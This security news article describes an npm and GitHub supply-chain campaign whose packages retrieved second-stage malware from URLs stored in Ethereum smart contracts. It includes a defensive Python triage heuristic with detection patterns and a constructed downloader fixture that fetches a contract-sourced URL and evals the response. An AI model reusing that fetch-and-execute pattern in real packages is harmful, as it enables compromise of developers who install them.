A malicious campaign targeting developers via npm and GitHub repositories has been uncovered, featuring an unusual technique of using Ethereum smart contracts to hide command-and-control (C2) infrastructure.
The campaign first came to light in early July when ReversingLabs researcher Karlo Zanki discovered a package named “colortoolsv2” on npm.
The package was quickly removed, but the attackers tried to continue the operation by publishing a duplicate package, “mimelib2.” Both packages deployed a second-stage malware payload via blockchain infrastructure.
What’s New in This Campaign
While malicious npm downloaders appear regularly, they typically contain URLs or scripts embedded in the package itself.
In contrast, colortoolsv2 and mimelib2 leveraged Ethereum smart contracts to store and deliver the URLs used for fetching the second-stage malware. This tactic made detection considerably harder, because the malicious infrastructure was hidden within the blockchain code rather than inside the package files.
“Downloaders are […] published weekly, [but] this use of smart contracts to load malicious commands is something we haven’t seen previously,” RL researchers said.
“It highlights the fast evolution of detection evasion techniques by malicious actors who are trolling open source repositories and developers.”
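A defender-side triage heuristic for the pattern described above, added here as an illustration and not ReversingLabs' tooling: it flags an npm package whose install-time code reads from a chain client library, fetches over the network, and passes the result to an execution sink. The package contents, regexes and severity levels are constructed assumptions, not data from the campaign.

```python
import re

# Three behaviours that, combined, match the downloader pattern described above:
# read from a chain via a client library, fetch what it points at, execute the result.
CHAIN_READ = re.compile(r"""require\(\s*['"](ethers|web3)['"]\s*\)|from\s+['"](ethers|web3)['"]""")
NET_FETCH = re.compile(r"\b(https?\.get|fetch|axios\.(get|post)|request)\s*\(")
EXEC_SINK = re.compile(r"\b(eval|new\s+Function|child_process|execSync|spawn|vm\.runIn\w+Context)\b")
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")  # hooks that run on `npm install`

def triage_npm_package(package_json: dict, sources: dict) -> dict:
    """Return a verdict ('high'/'medium'/'low') and the findings behind it (constructed heuristic)."""
    findings = []
    scripts = package_json.get("scripts", {})
    for hook in LIFECYCLE:
        if hook in scripts:
            findings.append(f"lifecycle script '{hook}': {scripts[hook]}")
    flags = set()
    for path, code in sources.items():
        for name, rx in (("chain_read", CHAIN_READ), ("net_fetch", NET_FETCH), ("exec_sink", EXEC_SINK)):
            if rx.search(code):
                flags.add(name)
                findings.append(f"{path}: {name}")
    if {"chain_read", "net_fetch", "exec_sink"} <= flags:
        verdict = "high"    # URL sourced on-chain, fetched, then executed: the downloader pattern
    elif "exec_sink" in flags and any(h in scripts for h in LIFECYCLE):
        verdict = "medium"  # code execution at install time, origin of the payload unclear
    else:
        verdict = "low"
    return {"verdict": verdict, "findings": findings}

# Constructed sample resembling the described downloader (placeholders, not a working package).
SUSPECT_PKG = {"name": "example-colortools", "version": "1.0.0",
               "scripts": {"postinstall": "node index.js"}}
SUSPECT_SRC = {"index.js": """
const { ethers } = require('ethers');
const https = require('https');
// reads a string from a contract, fetches it, executes the response
c.getString().then(u => https.get(u, r => r.on('end', () => eval(body))));
"""}
# Constructed benign sample: reads on-chain data but never fetches or executes code.
BENIGN_PKG = {"name": "example-balance-check", "version": "1.0.0", "scripts": {"test": "node test.js"}}
BENIGN_SRC = {"index.js": "const { ethers } = require('ethers');\nmodule.exports = p => p.getBalance('0xPLACEHOLDER');\n"}

if __name__ == "__main__":
    for pkg, src in ((SUSPECT_PKG, SUSPECT_SRC), (BENIGN_PKG, BENIGN_SRC)):
        print(pkg["name"], triage_npm_package(pkg, src))
```

Using a chain library alone is not a signal; the combination with a network fetch and an execution sink in install-time code is what separates the downloader from a legitimate wallet helper.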
GitHub Repositories Disguised as Trading Tools
ReversingLabs investigators also found that the npm packages were tied to a broader campaign across GitHub. Fake repositories, presented as cryptocurrency trading bots, appeared well-established with thousands of commits, multiple maintainers and active watchers.
However, much of this activity was fabricated. According to ReversingLabs, stars and watchers came from accounts created in July, each with minimal activity. In addition, puppet accounts acted as maintainers to inflate legitimacy, and forks and commits were used to create the illusion of popularity.
The most prominent example was a repository named “solana-trading-bot-v2,” which bundled the malicious npm package. Although it appeared to be a serious project, closer inspection revealed the network of fake accounts supporting it.
Emerging Threats to Open Source
The discovery adds to a growing list of software supply chain attacks targeting crypto-focused developers.
According to ReversingLabs’s 2025 Software Supply Chain Security report, there were 23 such campaigns in 2024, including a compromise of the PyPI package ultralytics in December that delivered a coin miner.
These incidents highlight the evolving tactics of attackers exploiting both open-source repositories and blockchain technology. ReversingLabs researchers warned that developers must carefully vet libraries and maintainers, looking beyond surface metrics such as stars or downloads.
The report concluded that vigilance and stronger package analysis tools are essential to protecting digital assets and development environments.